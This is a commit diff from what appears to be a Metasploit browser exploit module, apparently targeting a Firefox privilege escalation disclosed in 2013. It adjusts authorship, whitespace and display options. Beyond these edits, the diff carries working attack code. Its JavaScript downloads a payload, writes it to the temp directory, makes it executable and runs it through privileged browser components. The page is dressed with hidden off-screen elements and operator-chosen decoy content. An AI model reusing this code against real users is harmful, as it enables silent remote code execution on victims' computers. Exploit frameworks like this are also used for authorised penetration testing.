Whitespace tweaks and minor bug fix. Wrong payloads still run.
Joe Vennix
parent
f4b6db8c49
commit
178a43a772
|
|
@ -71,8 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'Author' =>
|
||||
[
|
||||
'joev', # metasploit module
|
||||
'Marius Mlynski' # discovery & bug report
|
||||
'Marius Mlynski', # discovery & bug report
|
||||
'joev' # metasploit module
|
||||
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -83,6 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Jan 08 2013'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
|
||||
], Auxiliary::Timed)
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
@ -105,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
# send initial HTML page
|
||||
print_status("Sending #{self.name}")
|
||||
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
|
||||
send_response_html(cli, generate_html)
|
||||
end
|
||||
handler(cli)
|
||||
end
|
||||
|
|
@ -153,12 +160,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
x.send(null);
|
||||
alert(x.responseText);
|
||||
var file = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
file.append('#{payload_filename}');
|
||||
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"].
|
||||
createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
||||
stream.write(x.responseText, x.responseText.length);
|
||||
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
||||
|
|
@ -169,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#{chmod_code}
|
||||
alert(file.path);
|
||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
process.init(file);
|
||||
process.run(false,[],0);
|
||||
|
|
||||
|
|
@ -204,18 +210,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:access_string => 'access',
|
||||
:frame_ref => 'frames[0]',
|
||||
:frame_name => 'n',
|
||||
:loader_path => "#{base_url}.swf"
|
||||
:loader_path => "#{base_url}.swf",
|
||||
:content => self.datastore['CONTENT'] || ''
|
||||
}
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=utf-8">
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg>
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
|
|
@ -250,7 +256,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</script>
|
||||
|
||||
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
|
||||
name="#{vars[:frame_name]}"></iframe>
|
||||
name="#{vars[:frame_name]}"></iframe>
|
||||
#{vars[:content]}
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
|
|
|||
Loading…
Reference in New Issue